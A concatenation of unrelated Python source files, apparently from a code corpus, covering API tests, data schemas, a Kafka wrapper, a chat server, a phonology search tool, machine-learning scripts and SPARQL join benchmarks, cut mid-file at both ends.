# Predict.
f_prod_post = f_prod | ((f1(x), s1), (f2(x), s2))
mean, lower, upper = f_prod_post(x).marginal_credible_bounds()

# Plot result.
plt.plot(x, s1, label="Sample 1", style="train")
plt.plot(x, s2, label="Sample 2", style="train", ls="--")
plt.plot(x, s1 * s2, label="True product", style="test")
plt.plot(x, mean, label="Approximate posterior", style="pred")
plt.fill_between(x, lower, upper, style="pred")
tweak()

plt.savefig("readme_example9_product.png")
plt.show()
439862
import json
from datetime import datetime

import requests
from django.test import TestCase
from rest_framework import status


class TestDataReadWrite(TestCase):
    def setUp(self):
        self.writeUrl = "https://zuri.chat/data/write"
        self.plugin_id = "123"
        self.org_id = "123"
        self.playlist = {
            "name": "Slow mode",
            "genre": "pop and soul",
            "date_created": datetime.now(),
            "songs": {},
            "comments": {},
            "likes": 0,
            "created_by": "classicmeone",
        }
        self.comment = {
            "comment": "Very good bad songs",
            "date_created": datetime.now(),
        }
        self.song = {
            "title": "Pimp Down",
            "artist": "Drake",
            "album": "CLB",
            "released": datetime.now(),
        }

    def test_WritePlaylist(self):
        data = {
            "plugin_id": self.plugin_id,
            "organization_id": self.org_id,
            "collection_name": "Playlists",
            "bulk_write": False,
            "object_id": "001",
            "filter": {},
            "payload": self.playlist,
        }
        res = requests.post(self.writeUrl, data=data)
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_WriteComment(self):
        data = {
            "plugin_id": self.plugin_id,
            "organization_id": self.org_id,
            "collection_name": "Comments",
            "bulk_write": False,
            "object_id": "001",
            "filter": {},
            "payload": self.comment,
        }
        res = requests.post(self.writeUrl, data=data)
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_WriteSong(self):
        data = {
            "plugin_id": self.plugin_id,
            "organization_id": self.org_id,
            "collection_name": "Songs",
            "bulk_write": False,
            "object_id": "001",
            "filter": {},
            "payload": self.song,
        }
        res = requests.post(self.writeUrl, data=data)
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_DataReadPlaylist(self):
        # /data/read/{plugin_id}/{collection_name}/{organization_id}
        url = "https://zuri.chat/data/read/123/Playlists/123"
        res = requests.get(url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        # Indexing res.text only yields single characters, so parse the JSON
        # body instead. NOTE: this assumes the read endpoint wraps the stored
        # records in a "data" list, as hinted by the commented-out `res.data`.
        records = json.loads(res.text).get("data") or []
        self.assertEqual(records[0]["name"], "Slow mode")

    def test_DataReadComment(self):
        url = "https://zuri.chat/data/read/123/Comments/123"
        res = requests.get(url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        records = json.loads(res.text).get("data") or []
        self.assertEqual(records[0]["comment"], "Very good bad songs")

    def test_DataReadSong(self):
        url = "https://zuri.chat/data/read/123/Songs/123"
        res = requests.get(url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        records = json.loads(res.text).get("data") or []
        print(records)
        self.assertEqual(records[0]["title"], "Pimp Down")
439873
from textwrap import dedent

from rest_framework.schemas.openapi import AutoSchema

boilerplate = dedent("""\
Allows for logging into Tator as an anonymous user.
""")


class AnonymousGatewaySchema(AutoSchema):
    def get_operation(self, path, method):
        operation = super().get_operation(path, method)
        if method == 'GET':
            operation['operationId'] = 'GetAnonymousGatewaySchema'
        operation['tags'] = ['Tator']
        return operation

    def get_description(self, path, method):
        return boilerplate

    def _get_filter_parameters(self, path, method):
        params = []
        if method == 'GET':
            params = [{
                'name': 'redirect',
                'in': 'query',
                'required': False,
                'description': 'URI to redirect to after logging in as anonymous user. '
                               'Defaults to /projects.',
                'schema': {'type': 'string'},
            }]
        return params
439874
from util import next_software_num


def test_next_software_num_for_non_existing_user_1():
    expected = 1
    actual = next_software_num(vm_id='does-not-exist-1')

    assert expected == actual


def test_next_software_num_for_non_existing_user_2():
    expected = 1
    actual = next_software_num(vm_id='does-not-exist-2')

    assert expected == actual


def test_next_software_num_for_existing_user_1():
    expected = 2
    actual = next_software_num(vm_id='scai-qrecc21-simple-baseline')

    assert expected == actual


def test_next_software_num_for_existing_user_2():
    expected = 6
    actual = next_software_num(vm_id='test-user')
    print(actual)

    assert expected == actual
439884
from datetime import datetime
from typing import Optional

from pydantic import ConstrainedStr, HttpUrl
from pydantic.types import NonNegativeInt

from app.schemas.addresses import AddressResponse
from app.schemas.base import BaseModel
from app.schemas.organizations import OrganizationResponse


class PostalCode(ConstrainedStr):
    min_length = 6
    max_length = 6


class LocationResponseBase(BaseModel):
    name: str
    phone: Optional[str]
    notes: Optional[str]
    active: int
    postcode: Optional[str]
    url: Optional[HttpUrl]
    tags: Optional[str]
    external_key: Optional[str]


class LocationResponse(LocationResponseBase):
    id: NonNegativeInt
    organization: Optional[int]
    address: Optional[int]
    created_at: datetime


class LocationExpandedResponse(LocationResponseBase):
    id: NonNegativeInt
    organization: Optional[OrganizationResponse]
    address: Optional[AddressResponse]
    created_at: datetime


class LocationCreateRequest(LocationResponseBase):
    organization: Optional[int]
    address: Optional[int]


class LocationUpdateRequest(LocationResponseBase):
    id: NonNegativeInt
    address: Optional[int]
    organization: Optional[int]


class LocationCreateRequestExpanded(LocationResponseBase):
    organization: Optional[int]
    line1: Optional[str]
    line2: Optional[str]
    city: Optional[str]
    province: str
    postcode: PostalCode
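
if __name__ == "__main__":
    # Illustrative sketch (assumes app.schemas.base.BaseModel behaves like a
    # plain pydantic model): PostalCode enforces exactly six characters, so
    # the second, seven-character value should fail validation. All field
    # values below are made up.
    from pydantic import ValidationError

    ok = LocationCreateRequestExpanded(
        name="Main Clinic", active=1, province="ON", postcode="M5V2T6")
    print(ok.postcode)

    try:
        LocationCreateRequestExpanded(
            name="Main Clinic", active=1, province="ON", postcode="M5V 2T6")
    except ValidationError as exc:
        print(exc.errors()[0]["msg"])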
439890
from typing import Optional

from confluent_kafka.cimpl import TIMESTAMP_NOT_AVAILABLE
from confluent_kafka.cimpl import Message as ConfluentKafkaMessage

from kafkian.serde.deserialization import Deserializer


class Message:
    """
    Message is an object (log record) consumed from Kafka.
    It provides read-only access to key, value, and message metadata:
    topic, partition, offset, and optionally timestamp and headers.

    Key and value are deserialized lazily, on first access.

    This class wraps cimpl.Message from confluent_kafka and is not supposed
    to be user-instantiated.
    """

    def __init__(
            self,
            message: ConfluentKafkaMessage,
            key_deserializer: Deserializer,
            value_deserializer: Deserializer
    ):
        self._message = message
        self._key_deserializer = key_deserializer
        self._value_deserializer = value_deserializer
        self._deserialized_key = None
        self._deserialized_value = None

    @property
    def key(self):
        """
        :return: Deserialized message key
        """
        # Compare against None so falsy-but-valid keys (0, "", etc.) stay cached.
        if self._deserialized_key is not None:
            return self._deserialized_key
        if self._message.key() is None:
            return None
        self._deserialized_key = self._key_deserializer.deserialize(self._message.key())
        return self._deserialized_key

    @property
    def value(self):
        """
        :return: Deserialized message value
        """
        if self._deserialized_value is not None:
            return self._deserialized_value
        if self._message.value() is None:
            return None
        self._deserialized_value = self._value_deserializer.deserialize(self._message.value())
        return self._deserialized_value

    @property
    def topic(self) -> str:
        """
        :return: Message topic
        """
        return self._message.topic()

    @property
    def partition(self) -> int:
        """
        :return: Message partition
        """
        return self._message.partition()

    @property
    def offset(self) -> int:
        """
        :return: Message offset
        """
        return self._message.offset()

    @property
    def timestamp(self) -> Optional[int]:
        """
        :return: Message timestamp, or None if not available.
        """
        if not self._message.timestamp():
            return None
        if self._message.timestamp()[0] == TIMESTAMP_NOT_AVAILABLE:
            return None
        return self._message.timestamp()[1]

    @property
    def timestamp_type(self) -> Optional[int]:
        """
        :return: Message timestamp type - either message creation time or
            Log Append time, or None if not available.
        """
        if not self._message.timestamp():
            return None
        return self._message.timestamp()[0]

    @property
    def headers(self) -> list:
        """
        :return: Message headers as list of two-tuples, one (key, value) pair
            for each header.
        :rtype: [(str, bytes),...] or None.
        """
        return self._message.headers() or []
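
# Illustrative helper (not part of kafkian): summarizes the read-only
# metadata this wrapper exposes. `msg` would come from whatever consumer
# loop the application uses.
def describe_message(msg: Message) -> str:
    return (
        f"topic={msg.topic} partition={msg.partition} offset={msg.offset} "
        f"timestamp={msg.timestamp} headers={len(msg.headers)}"
    )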
439914
def test_configuration_session(eos_conn):
    eos_conn.register_configuration_session(session_name="scrapli_test_session1")
    result = eos_conn.send_configs(
        configs=["interface ethernet 1", "show configuration sessions"],
        privilege_level="scrapli_test_session1",
    )
    eos_conn.close()

    # pop the config session out
    eos_conn.privilege_levels.pop("scrapli_test_session1")

    assert "* scrapli_test_session" in result[1].result


def test_configuration_session_abort(eos_conn):
    eos_conn.register_configuration_session(session_name="scrapli_test_session2")
    result = eos_conn.send_configs(
        configs=["tacocat", "show configuration sessions"],
        privilege_level="scrapli_test_session2",
        stop_on_failed=True,
    )
    current_prompt = eos_conn.get_prompt()
    eos_conn.close()

    # pop the config session out
    eos_conn.privilege_levels.pop("scrapli_test_session2")

    # assert config session was aborted at first sign of failed config
    assert len(result) == 1
    # assert that session aborted and we are back at priv exec
    assert current_prompt == "localhost#"
439925
from django.core.management import BaseCommand
from django.db.models import Q
from django.utils import timezone

from data.constants import RACE_UNKNOWN_STRINGS
from data.models import Victim, Complainant, Involvement, Officer


class Command(BaseCommand):
    def handle(self, *args, **kwargs):
        now = timezone.now()
        for klass in [Victim, Complainant, Involvement, Officer]:
            query = Q()
            for race_string in RACE_UNKNOWN_STRINGS:
                query |= Q(race__iexact=race_string)
            klass.objects.filter(query).update(race='Unknown', updated_at=now)
439930
from ursinanetworking import *

Server = UrsinaNetworkingServer("localhost", 25565)


@Server.event
def changeName(client, new_name):
    client.name = new_name
    Server.broadcast("messageReceveid", f"{client.name} joined the chat !")


@Server.event
def onClientDisconnected(client):
    Server.broadcast("messageReceveid", f"{client.name} left the chat !")


@Server.event
def message(client, message):
    Server.broadcast("messageReceveid", f"{client.name} : {message}")


while True:
    Server.process_net_events()
439968
import argparse
import os
import csv
import re
import sys

# default to importing from CorpusTools repo
base = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
sys.path.insert(0, base)

from corpustools.corpus.io import load_binary
from corpustools.corpus.classes.lexicon import EnvironmentFilter
from corpustools.phonosearch.phonosearch import phonological_search


def main():
    #### Parse command-line arguments
    parser = argparse.ArgumentParser(description=
        'Phonological CorpusTools: phonological search CL interface')
    parser.add_argument('corpus_file_name', help='Name of corpus file')
    parser.add_argument('sequence', help=('Sequence to search for, with segment positions separated by commas,'
                                          + ' and with sets separated by slashes.'
                                          + ' E.g. the input i will return all words with the segment [i], while'
                                          + ' the input a/o,t/p,i,n will return all words with [atin], [apin],'
                                          + ' [otin], or [opin].'))
    parser.add_argument('-s', '--sequence_type', default='transcription',
                        help="The attribute of Words to search within. Normally this will be the transcription, but it can also be the spelling or a user-specified tier.")
    parser.add_argument('-o', '--outfile', help='Name of output file')

    args = parser.parse_args()

    ####

    try:
        home = os.path.expanduser('~')
        corpus = load_binary(os.path.join(home, 'Documents', 'PCT', 'CorpusTools', 'CORPUS', args.corpus_file_name))
    except FileNotFoundError:
        corpus = load_binary(args.corpus_file_name)

    split_sequence = [tuple(pos.split('/')) for pos in args.sequence.split(',')]
    middle = split_sequence[0]
    rhs = split_sequence[1:]
    if len(rhs) == 0:
        rhs = None

    ef = EnvironmentFilter(middle, None, rhs)
    results = phonological_search(corpus, [ef], sequence_type=args.sequence_type)

    if args.outfile:
        with open(args.outfile, 'w') as outfile:
            for result in results:
                outfile.write(' '.join(getattr(result[0], args.sequence_type)) + '\n')
        print('Search results written to output file.')
    else:
        print('No output file name provided.')
        print('Your search produced the results below:')
        for result in results:
            print('{}'.format(result[0]))
        print('Total number of results: {}'.format(str(len(results))))
        print('Please specify an output file name with -o to save these results.')


if __name__ == '__main__':
    main()
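# Example invocation (illustrative; the script and corpus file names are
# made up):
#
#   python pct_search.py lemurian.corpus a/o,t/p,i,n -s transcription -o hits.txt
#
# This finds every word containing [atin], [apin], [otin], or [opin] on the
# transcription tier and writes one match per line to hits.txt.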
440044
from src.base_sample.core import Core
from multiprocessing import freeze_support, cpu_count
import argparse
import logging

if __name__ == '__main__':
    freeze_support()

    parser = argparse.ArgumentParser()
    parser.add_argument("-m", "--mic_amount", type=int, help="microphone amount")
    parser.add_argument("-p", "--proc_number", type=int, help="process number")
    parser.add_argument("-t", "--trials", type=int, help="trials number")
    parser.add_argument("-f", "--file", type=str, help="file name")
    parser.add_argument("-l", "--log_file", type=str, help="log file")
    args = parser.parse_args()

    # Log to the given file when one is provided, otherwise to the console.
    if args.log_file:
        logging.basicConfig(format='%(levelname)s, PID: %(process)d, %(asctime)s:\t%(message)s',
                            filename=args.log_file,
                            level=logging.INFO)
    else:
        logging.basicConfig(format='%(levelname)s, PID: %(process)d, %(asctime)s:\t%(message)s',
                            level=logging.INFO)

    if args.proc_number:
        if args.proc_number <= 0:
            raise ValueError('proc_number must be a positive integer.')
        cores_to_use = args.proc_number
    else:
        cores_to_use = cpu_count()

    core = Core(args.file, mic_amount=args.mic_amount, trials=args.trials, proc_number=cores_to_use)
    core.generate_source_positions()
    core.generate_distances()
    core.prepare()
    core.generate_signals()

    for trial_number in range(core.trials):
        logging.info('Trial number: %d', trial_number + 1)
        logging.info('Estimated X = %.15f, Estimated Y = %.15f, Estimated Z = %.15f',
                     float(core.estimated_positions[trial_number][0]),
                     float(core.estimated_positions[trial_number][1]),
                     float(core.estimated_positions[trial_number][2]))
        logging.info('True X = %.15f, True Y = %.15f, True Z = %.15f',
                     float(core.true_positions[trial_number][0]),
                     float(core.true_positions[trial_number][1]),
                     float(core.true_positions[trial_number][2]))

    core.draw_plot()
440048
import torchvision
from torchvision import transforms

from uvcgan.torch.select import extract_name_kwargs

TRANSFORM_DICT = {
    'center-crop'            : transforms.CenterCrop,
    'color-jitter'           : transforms.ColorJitter,
    'random-crop'            : transforms.RandomCrop,
    'random-flip-vertical'   : transforms.RandomVerticalFlip,
    'random-flip-horizontal' : transforms.RandomHorizontalFlip,
    'random-rotation'        : transforms.RandomRotation,
    'resize'                 : transforms.Resize,
    'CenterCrop'             : transforms.CenterCrop,
    'ColorJitter'            : transforms.ColorJitter,
    'RandomCrop'             : transforms.RandomCrop,
    'RandomVerticalFlip'     : transforms.RandomVerticalFlip,
    'RandomHorizontalFlip'   : transforms.RandomHorizontalFlip,
    'RandomRotation'         : transforms.RandomRotation,
    'Resize'                 : transforms.Resize,
}


def select_single_transform(transform):
    name, kwargs = extract_name_kwargs(transform)

    if name not in TRANSFORM_DICT:
        raise ValueError(f"Unknown transform: '{name}'")

    return TRANSFORM_DICT[name](**kwargs)


def select_transform(transform):
    result = []

    if transform is not None:
        if not isinstance(transform, (list, tuple)):
            transform = [ transform, ]

        result = [ select_single_transform(x) for x in transform ]

    result.append(torchvision.transforms.ToTensor())

    return torchvision.transforms.Compose(result)
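
if __name__ == "__main__":
    # Illustrative sketch: transforms may be given as bare names or, by
    # assumption about `extract_name_kwargs`, as dicts with a 'name' key
    # plus keyword arguments for the underlying torchvision class.
    pipeline = select_transform([
        {"name": "resize", "size": 286},
        {"name": "random-crop", "size": 256},
        "random-flip-horizontal",
    ])
    print(pipeline)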
440051
from time import time

from rdfframes.knowledge_graph import KnowledgeGraph
from rdfframes.client.http_client import HttpClientDataFormat, HttpClient
from rdfframes.client.sparql_endpoint_client import SPARQLEndpointClient
from rdfframes.utils.constants import JoinType

__author__ = "Ghadeer"

endpoint = 'http://10.161.202.101:8890/sparql/'
port = 8890
output_format = HttpClientDataFormat.PANDAS_DF
max_rows = 1000000
timeout = 12000
"""
client = HttpClient(endpoint_url=endpoint,
                    port=port,
                    return_format=output_format,
                    timeout=timeout,
                    max_rows=max_rows
                    )
"""
client = SPARQLEndpointClient(endpoint)

graph = KnowledgeGraph(graph_name='dbpedia')


def expand_groupby_join(join_type):
    basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\
        .expand('player', [('dbpp:team', 'team')])\
        .group_by(['team']).count('player', 'count_basketball_players', True)
    basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\
        .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')])
    basketball_palyer_team = basketball_team.join(basketball_palyer, 'team', join_type=join_type)
    print("SPARQL QUERY FOR JOIN TYPE {} \n{}\n".format(join_type, basketball_palyer_team.to_sparql()))
    #df = basketball_palyer_team.execute(client)
    #print(basketball_palyer_team.to_sparql())
    #df = dataset.execute(client, return_format=output_format)
    #print(df.shape)


def groupby_expand_join(join_type):
    basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\
        .expand('player', [('dbpp:team', 'team')])\
        .group_by(['team']).count('player', 'count_basketball_players', True)
    basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\
        .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')])
    basketball_palyer_team = basketball_palyer.join(basketball_team, 'team', join_type=join_type)
    print("SPARQL QUERY FOR JOIN TYPE {} \n{}\n".format(join_type, basketball_palyer_team.to_sparql()))


def expand_join(join_type):
    basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\
        .expand('player', [('dbpp:nationality', 'nationality'), ('dbpp:birthPlace', 'place'),
                           ('dbpp:birthDate', 'birthDate'), ('dbpp:team', 'team')])
    basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\
        .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')])
    basketball_palyer_team = basketball_team.join(basketball_palyer, 'team', join_type=join_type)
    print(basketball_palyer_team.to_sparql())
    #df = basketball_palyer_team.execute(client)


def group_join(join_type):
    basket_ball = graph.entities('dbpo:BasketballPlayer', entities_col_name='player') \
        .expand('player', [('dbpp:birthPlace', 'place')]) \
        .group_by(['place']).count('player', 'count_basketball_players', True)
    tennis = graph.entities('dbpo:TennisPlayer', entities_col_name='player') \
        .expand('player', [('dbpp:birthPlace', 'place')]) \
        .group_by(['place']).count('player', 'count_tennis_players', True)
    teams = basket_ball.join(tennis, 'place', join_type=join_type)
    print(teams.to_sparql())


start = time()
expand_groupby_join(JoinType.InnerJoin)
duration = time() - start
print("Duration of Inner join on expandable grouped datasets = {} sec".format(duration))

start = time()
groupby_expand_join(JoinType.InnerJoin)
duration = time() - start
print("Duration of Inner join on grouped expandable datasets = {} sec".format(duration))

start = time()
expand_groupby_join(JoinType.LeftOuterJoin)
duration = time() - start
print("Duration of LeftOuter Join on expandable grouped datasets = {} sec".format(duration))

start = time()
groupby_expand_join(JoinType.LeftOuterJoin)
duration = time() - start
print("Duration of LeftOuter Join on grouped expandable datasets = {} sec".format(duration))

start = time()
expand_groupby_join(JoinType.RightOuterJoin)
duration = time() - start
print("Duration of RightOuter Join on expandable grouped datasets = {} sec".format(duration))

start = time()
groupby_expand_join(JoinType.RightOuterJoin)
duration = time() - start
print("Duration of RightOuter Join on grouped expandable datasets = {} sec".format(duration))

start = time()
expand_groupby_join(JoinType.OuterJoin)
duration = time() - start
print("Duration of Outer join on expandable grouped datasets = {} sec".format(duration))

start = time()
groupby_expand_join(JoinType.OuterJoin)
duration = time() - start
print("Duration of Outer join on grouped expandable datasets = {} sec".format(duration))

start = time()
expand_join(JoinType.InnerJoin)
duration = time() - start
print("Duration of Inner join on expandable datasets = {} sec".format(duration))

start = time()
expand_join(JoinType.LeftOuterJoin)
duration = time() - start
print("Duration of LeftOuter Join on expandable datasets = {} sec".format(duration))

start = time()
expand_join(JoinType.RightOuterJoin)
duration = time() - start
print("Duration of RightOuter Join on expandable datasets = {} sec".format(duration))

start = time()
expand_join(JoinType.OuterJoin)
duration = time() - start
print("Duration of Outer join on expandable datasets = {} sec".format(duration))

start = time()
group_join(JoinType.InnerJoin)
duration = time() - start
print("Duration of Inner join on grouped datasets = {} sec".format(duration))

start = time()
group_join(JoinType.LeftOuterJoin)
duration = time() - start
print("Duration of LeftOuter Join on grouped datasets = {} sec".format(duration))

start = time()
group_join(JoinType.RightOuterJoin)
duration = time() - start
print("Duration of RightOuter Join on grouped datasets = {} sec".format(duration))

start = time()
group_join(JoinType.OuterJoin)
duration = time() - start
print("Duration of Outer join on grouped datasets = {} sec".format(duration))
440055
from SDLInterface import SDLInterface

import xml.etree.ElementTree as ElementTree


class InterfaceParser:
    begin_tag = "<SDL_interface>"
    end_tag = "</SDL_interface>"

    def __init__(self, raw_string):
        self.interface = None

        begin_index = raw_string.find(InterfaceParser.begin_tag)
        end_index = raw_string.rfind(InterfaceParser.end_tag)
        if begin_index == -1 or end_index == -1 or end_index <= begin_index:
            return

        interface_string = raw_string[begin_index:end_index + len(InterfaceParser.end_tag)]
        self.interface = SDLInterface(ElementTree.fromstring(interface_string))

    def has_interface(self):
        return self.interface is not None
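
if __name__ == "__main__":
    # Illustrative sketch: input without a complete <SDL_interface> block
    # yields no interface; a well-formed block would be parsed into an
    # SDLInterface (whose expected XML schema is defined elsewhere).
    parser = InterfaceParser("no interface markup here")
    print(parser.has_interface())  # False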
440078
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'

# Create your first MLP in Keras
from keras.models import Sequential
from keras.layers import Dense
from keras.models import model_from_json
from keras.models import model_from_yaml
from sklearn.model_selection import train_test_split
from sklearn import metrics
import numpy
import pandas as pd

df_train = pd.read_csv('num-train.csv')
df_test = pd.read_csv('num-test.csv')
test_actual = pd.read_csv('test.csv')
uid = test_actual['UCIC_ID']

# # split into input (X) and output (y) variables
# X = df_train.drop(['Responders'], axis = 1)
# y = df_train.Responders.values
# X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 1, test_size = 0.9)

# # create model
# model = Sequential()
# model.add(Dense(400, input_dim=204, activation='relu'))
# model.add(Dense(400, activation='relu'))
# model.add(Dense(1, activation='sigmoid'))

# # Compile model
# model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])

# # Fit the model
# model.fit(X_train.values, y_train, epochs=10, batch_size=10)

# # evaluate the model
# scores = model.evaluate(X_test.values, y_test)
# print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))

# model.fit(X.values, y, epochs=10, batch_size=10)

# try :
#     y_pred = model.predict(df_test.values)
#     print(type(y_pred))
#     subm = pd.DataFrame({'UCIC_ID':uid.values, 'Responders':y_pred})
#     subm.set_index('UCIC_ID', inplace = True)
#     subm.to_csv('mlp-keras-submission.csv')
# except Exception as e:
#     print(e)

# load json and create model
json_file = open('model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights("model.h5")
print("Loaded model from disk")

# evaluate loaded model on test data
loaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
predictions = loaded_model.predict(df_test.values)
# round predictions
rounded = [round(x[0]) for x in predictions]
print(rounded)

# # serialize model to JSON
# model_json = model.to_json()
# with open("model.json", "w") as json_file:
#     json_file.write(model_json)
# # serialize weights to HDF5
# model.save_weights("model.h5")
# print("Saved model to disk")

# # serialize model to YAML
# model_yaml = model.to_yaml()
# with open("model.yaml", "w") as yaml_file:
#     yaml_file.write(model_yaml)
440081
from ocd_backend.transformers import BaseTransformer
from ocd_backend.models import *


class MotionItem(BaseTransformer):
    def transform(self):
        source_defaults = {
            'source': 'partijgedrag',
            'supplier': 'gegevensmagazijn',
            'collection': 'motion',
        }

        motion = Motion(self.original_item['identifier'], **source_defaults)
        motion.name = self.original_item.get('titel')
        motion.text = self.original_item.get('tekst')
        motion.date = self.original_item.get('issuedate')
        motion.legislative_session = self.original_item['jaar']
        motion.organization = Organization('TK', **source_defaults)

        if 'indieners' in self.original_item and len(self.original_item['indieners']) > 0:
            indiener_id, indiener_naam = self.original_item['indieners'][0]
            if not indiener_id:
                indiener_id = indiener_naam
            creator = Person(indiener_id, **source_defaults)
            creator.name = indiener_naam
            motion.creator = creator

        if 'indieners' in self.original_item and len(self.original_item['indieners']) > 1:
            motion.cocreator = list()
            for indiener_id, indiener_naam in self.original_item['indieners'][1:]:
                if not indiener_id:
                    indiener_id = indiener_naam
                cocreator = Person(indiener_id, **source_defaults)
                cocreator.name = indiener_naam
                motion.cocreator.append(cocreator)

        vote_event = VoteEvent(self.original_item['identifier'], **source_defaults)
        vote_event.start_date = self.original_item.get('issuedate')
        if self.original_item['uitslag']:
            vote_event.result = ResultPassed
        elif not self.original_item['uitslag']:
            vote_event.result = ResultFailed

        if 'votes' in self.original_item:
            votes = list()
            for vote_option, vote_option_parties in self.original_item['votes'].items():
                for vote_party in vote_option_parties:
                    vote = Vote()
                    if 'kamerlid' in vote_party:
                        voter = Person(vote_party['kamerlid'], **source_defaults)
                        voter.name = vote_party['kamerlid']
                        vote.voter = voter
                    group = Organization(vote_party['partij'], **source_defaults)
                    group.name = vote_party['partij']
                    vote.group = group
                    vote.weight = vote_party['aantal']
                    if vote_option == 'voor':
                        vote.option = VoteOptionYes
                    elif vote_option == 'tegen':
                        vote.option = VoteOptionNo
                    elif vote_option == 'afwezig':
                        vote.option = VoteOptionAbsent
                    votes.append(vote)
            vote_event.votes = votes

        motion.vote_events = vote_event

        return motion
440100
import copy

import numpy as np
import torch

from agent import CustomAgent
from generic import to_pt


class EnsembleAgent(CustomAgent):

    def get_ranks_greedy(self, obs, infos, input_quest, input_quest_mask, quest_id_list,
                         previous_commands, previous_dynamics, previous_belief):
        with torch.no_grad():
            batch_size = len(obs)

            # update inputs for answerer
            if self.not_finished_yet is None:
                self.not_finished_yet = np.ones((len(obs),), dtype="float32")
                self.naozi.push_batch(copy.deepcopy(obs))
                self.kg.push_batch(copy.deepcopy(obs), previous_commands, [item["srl"] for item in infos])
            else:
                for i in range(batch_size):
                    if self.not_finished_yet[i] == 1.0:
                        self.naozi.push_one(i, copy.deepcopy(obs[i]))
                        self.kg.push_one(i, copy.deepcopy(obs[i]), previous_commands[i], infos[i]["srl"])

            description_list = self.naozi.get()
            input_description, input_description_mask, description_id_list = self.get_agent_inputs(description_list)
            ctrlf_word_mask, _ = self.get_word_mask(quest_id_list, description_id_list)

            current_belief = [None] * batch_size
            if self.enable_graph_input == "gata":
                current_adjacency_matrix, current_belief, previous_adjacency_matrix = self.graph_update_during_rl(input_description, input_description_mask, previous_belief)
                for i in range(batch_size):
                    if self.not_finished_yet[i] == 0.0:
                        current_adjacency_matrix[i] = previous_adjacency_matrix[i]
                        current_belief[i] = previous_belief[i]
                node_representations, node_mask = self.encode_belief_graph(current_adjacency_matrix, use_model="online")
                node_vocabulary, relation_vocabulary, graph_triplets = [None] * batch_size, [None] * batch_size, [None] * batch_size
            elif self.enable_graph_input != "false":
                graph_triplets, node_vocabulary, relation_vocabulary, graph_adj_np = self.kg.get()
                graph_adj = to_pt(graph_adj_np, enable_cuda=self.use_cuda, type="float")
                node_features, node_mask, relation_features, relation_mask = self.get_gcn_input_features(node_vocabulary, relation_vocabulary, use_model="online")
                node_representations = self.get_graph_representations(node_features, node_mask, relation_features, relation_mask, graph_adj, use_model="online")  # batch x max_n_node x hid
            else:
                graph_triplets, node_vocabulary, relation_vocabulary = [None] * batch_size, [None] * batch_size, [None] * batch_size
                node_representations, node_mask, relation_mask = None, None, None

            action_rank, ctrlf_rank, current_dynamics = self.get_ranks(input_description, input_description_mask, input_quest, input_quest_mask, ctrlf_word_mask, node_representations, node_mask, node_vocabulary, previous_dynamics, use_model="online")  # list of batch x vocab

            # info for replay memory
            for i in range(batch_size):
                if self.prev_actions[-1][i] == "stop":
                    self.prev_step_is_still_interacting[i] = 0.0
            # previous step is still interacting, this is because DQN requires one step extra computation
            replay_info = [to_pt(self.prev_step_is_still_interacting, False, "float")]

            return action_rank, ctrlf_rank, ctrlf_word_mask, current_dynamics, current_belief, replay_info

    def get_qa_ranks_greedy(self, observation_list, quest_list, belief):
        with torch.no_grad():
            batch_size = len(observation_list)
            current_belief = None
            if self.enable_graph_input == "gata":
                current_belief = belief
                graph_adj, node_vocabulary, relation_vocabulary = None, [None] * batch_size, [None] * batch_size
            elif self.enable_graph_input != "false":
                _, node_vocabulary, relation_vocabulary, graph_adj_np = self.kg.get()
                graph_adj = to_pt(graph_adj_np, enable_cuda=self.use_cuda, type="float")
            else:
                graph_adj, node_vocabulary, relation_vocabulary = None, [None] * batch_size, [None] * batch_size

            point_rank, mask = self.answer_question(observation_list, quest_list, node_vocabulary, relation_vocabulary, graph_adj, current_belief)  # batch x time x 2
            return point_rank, mask
440112
import os, sys, time, ipdb, argparse, cv2, scipy, skimage, glob
import torch
import torch.optim
from torch.autograd import Variable
import torch.nn as nn
from torchvision import models
import torch.nn.functional as F
import torchvision.transforms as transforms
# from torch.utils.data import Dataset, TensorDataset
from srblib import abs_path
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.colors import ListedColormap
from PIL import ImageFilter, Image
# from robustness import model_utils, datasets
from user_constants import DATA_PATH_DICT
import settings
import warnings
warnings.filterwarnings("ignore")
import utils as eutils

use_cuda = torch.cuda.is_available()
FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor
Tensor = FloatTensor

# os.environ.set("MAX_LEN_IDENTIFIER", 300)
text_file = abs_path(settings.paper_img_txt_file)
# text_file = f'/home/naman/CS231n/heatmap_tests/' \
#             f'Madri/Madri_New/robustness_applications/img_name_files/' \
#             f'time_15669152608009198_seed_0_' \
#             f'common_correct_imgs_model_names_madry_ressnet50_googlenet.txt'
img_name_list = []
with open(text_file, 'r') as f:
    for line in f:
        img_name_list.append(line.split('\n')[0])

## For reproducibility
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False

########################################################################################################################
def get_arguments():
    # Initialize the parser
